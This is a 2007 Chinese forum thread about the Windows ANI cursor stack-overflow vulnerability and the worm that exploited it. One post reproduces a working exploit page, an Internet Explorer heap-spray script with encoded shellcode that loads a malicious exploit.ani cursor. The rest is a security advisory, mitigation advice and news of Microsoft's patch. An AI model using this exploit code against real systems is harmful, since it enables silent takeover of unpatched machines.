ANI病毒1天出现5变种 制造者发誓今年买宝马

哎

ani是国外某黑客公布的IE0day,感染从Win95到win2003的所有版本。 是一个栈溢出，发生在USER32!LoadAniIcon空间，构造一个变态的ani文件， 结合这样的网页代码: --------------------------------------------- <!-- Microsoft ANI Buffer Overflow Exploit Author: Trirat Puttaraksa http://sf-freedom.blogspot.com --> <html> <head> </head> <script> shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<350;i++) memory[i] = block + shellcode; </script> <body style="CURSOR: url('exploit.ani')"> </body> </html> ---------------------------------------------------------- 可以直接对IE进行溢出，普通用户可能没有任何知觉。 本想研究一下的，不过m$会在本月的安全更新内更新此漏洞，也就没有太大的使用价值了 用户除使用杀软外，还可以启动xp+sp2以上提供的DEP保护功能(我的电脑-->属性-->高级-- >设置-->数据执行保护，选中第二条),虽然DEP可以绕过，但尚未见到绕过DEP的shellcode (除了我自己写的,嘿嘿...)，或者使用mcafee的anti-virus，因为它带了缓冲区溢出保护功能，对付这种一般的溢出型虫子足够了，并且，是免费的，还能随时自动升级。 【 在 chhsh (冰封的记忆) 的大作中提到: 】 : 瑞星称,其全球反病毒监测网监测到前日被截获的“ANI蠕虫”在短短24小时内接连出现5个变种,在互联网上迅速扩散. : 该公司反病毒专家称,这些“ANI蠕虫”的变种同样利用上周末才刚出现的Vista、XP等操作系统的ANI高危漏洞,至今微软尚未发布针对该漏洞的补丁.由于此病毒传染速度快、威胁较大,瑞星于上周末发出今年第一个“橙色安全警报”(二级). : 针对此病毒,国内另一家杀毒软件厂商江民科技也称其反病毒中心已监测到多个网站正在传播该病毒. : ...................

【 在 flyingkisser 的大作中提到: 】 : ani是国外某黑客公布的IE0day,感染从Win95到win2003的所有版本。 : 是一个栈溢出，发生在USER32!LoadAniIcon空间，构造一个变态的ani文件， : 结合这样的网页代码: : ................... 顶，猫哥

顶……谢技术楼……

Microsoft Windows 动画图标文件栈溢出漏洞 发布日期：2007-04-02 受影响的软件及系统： ==================== Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server 2003 Microsoft Windows Vista 综述： ====== Microsoft Windows在处理畸形的动画图标文件时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户机器。在本公告发布之时，目前微软尚未给出该漏洞的补丁程序。 分析： ====== Microsoft Windows 的user32.dll中用于处理动画光标的LoadAniIcon()函数没有正确的验证动画光标文件中所提供动画光标文件头的大小，存在栈溢出漏洞。 该函数可能在很多场合被调用。例如，WEB站点可能使用动画光标文件指定鼠标指针停留在超级链接上时所应使用的图标，资源管理器在打开包含动画光标文件的文件夹时会解析该文件的内容作为文件图标。也就是说，入侵者可以通过在网页中插入恶意代码，或者发送恶意邮件，或者将动画光标文件拷贝到共享目录等方式来进行入侵。 值得注意的是，资源管理器在遇到.ani、.cur或.ico等扩展名时会试图调用LoadAniIcon()函数进行解析，其它扩展名则不会，但是在网页中插入恶意动画光标时，光标文件的扩展名则没有限制，譬如.jpg。 该漏洞的影响范围十分广泛，涵盖了Windows 2000/XP/2003/Vista的所有版本，并且可以由多种途径触发，导致执行任意指令，所以威胁非常大。目前国内已经有入侵者利用该漏洞进行“网站挂马”。 解决方法： ========== 在微软推出相应安全补丁之前，我们建议您采取如下措施减轻安全威胁： 1、以文本方式而不是HTML方式打开邮件。这可以避免被入侵者通过发送邮件的方式进行攻击。 2、和以往的很多漏洞不同，这个漏洞也可能影响FireFox和Opera等浏览器。使用这些第三方浏览器可以降低被攻击的可能，但并不能绝对避免攻击。所以我们建议在微软发布安全补丁之前，尽可能减少使用任何浏览器访问网站。即使是那些合法的站点也可能因为被入侵而插入恶意代码。在必须访问的时候，应尽可能使用FireFox或Opera等浏览器。 3、打开资源浏览器的“工具->文件夹选项”菜单，在“Web 视图”中选择“使用Windows 传统风格的文件夹”。这个配置可以避免在资源浏览器中打开包含恶意动画光标文件而导致的攻击。 4、如果您的操作系统是Windows XP/2003/Vista，请参考下面这个链接，将DEP配置为“为除下列选定程序之外的所有程序和服务启用 DEP”： http://www.microsoft.com/china/technet/security/prodtech/windowsxp/depcnfxp.mspx 这并不能消除漏洞，但是可以大大降低因为该漏洞而被入侵的风险。 附加信息： ========== http://www.microsoft.com/technet/security/advisory/935423.mspx http://www.kb.cert.org/vuls/id/191609 声 明 ========== 本安全公告仅用来描述可能存在的安全问题，绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告，必须保证此安全公告的完整性，包括版权声明等全部内容。未经绿盟科技允许，不得任意修改或者增减此安全公告内容，不得以任何方式将其用于商业目的。

赞技术楼

好~~

CB于4月4日凌晨第一时间报道, 微软刚刚放出了ANI漏洞的补丁, 请各位尽快下载安装! 漏洞名称: GDI漏洞导致远程代码被执行 (925902) 漏洞的影响: 远程执行代码 最高严重等级: 严重 受影响的操作系统: 所有基于NT架构的Windows系统 描述: 现已确认有一个安全问题, 攻击者可能会利用此问题危及 Windows 系统的安全并获取对该系统的控制权. 您可通过安装本 Microsoft 更新程序来保护计算机不受侵害. 安装本更新程序之后, 可能需要重新启动计算机. 补丁包分类下载: Windows XP 更新程序 (KB925902) Windows XP x64 Edition 安全更新程序 (KB925902) 用于基于 x64 的系统的 Windows Vista 安全更新程序 (KB925902) Windows Vista 安全更新程序 (KB925902) Windows Server 2003 x64 Edition 安全更新程序 (KB925902) Windows Server 2003 安全更新程序 (KB925902) Windows 2000 安全更新程序 (KB925902)